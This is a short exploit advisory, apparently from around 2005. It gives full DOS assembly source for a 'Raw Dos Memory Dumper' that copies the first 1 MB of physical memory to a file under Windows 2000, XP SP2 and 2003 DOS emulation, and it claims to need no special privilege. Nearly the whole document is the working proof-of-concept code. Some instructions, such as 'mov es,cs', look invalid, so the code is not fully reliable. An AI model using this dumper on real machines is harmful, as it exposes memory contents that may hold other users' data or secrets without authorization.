Desc : Windows Dos emulation allows dumping of first 1 Mo of RAM (with no particular privilege). Tested under : Win 2000, XP SP2, 2003 Code : ;---------------- [ dumper.asm ]----------------------------------------- ; Dump first 1 Mo of memory under any MS product ; 1 Mo is the maximum quantity of accessible memory ; in real mode using 16b OSes. ; ; endrazine, last update : 30/12/2005 ; ;------------------------------------------------------------------------- code segment org 100h assume ds:code, es:code, cs:code xor ax,ax mov si,ax start: mov ah, 09h mov dx,offset welcome int 21h xor ax,ax ;Wait until key pressed int 16h mov ah, 3ch ; MS DOS Create file Function mov dx, offset fname xor cx,cx int 21h mov ax, 3d01h ; MS DOS Open file Function int 21h mov handle,ax xor ax,ax mov ds,ax mov myds,ds mov cx,32 dabigloop: push cx xor ax,ax mov si,ax ;==destination== mov di,offset buffer mov es,cs ;==compteur== mov cx,16384 ;==copy== rep movsw mov ds,cs xor ax,ax mov ah, 40h mov bx,handle mov cx,32768; +10 mov dx, offset buffer int 21h mov ax,myds ;add ax,2047 ;repeat last 16b add ax,2048 mov myds,ax mov ds,ax pop cx loop dabigloop mov ax,4ch ; Quit int 21h myds dw ? handle dw ? welcome db '[ Raw Dos Memory Dumper ]',10,13 db '',10,13 db '[ coded by endrazine ]',10,13 db '',10,13 db '[ Dumping First Memory chunk to Dump.txt ]',10,13 db 'Press any key$',10,13 fname db 'Dump.txt',0 buffer db 32768 dup ? some_canari_separator db '//////////',0 end start end ;------------------------------------------------------------------------ Endrazine-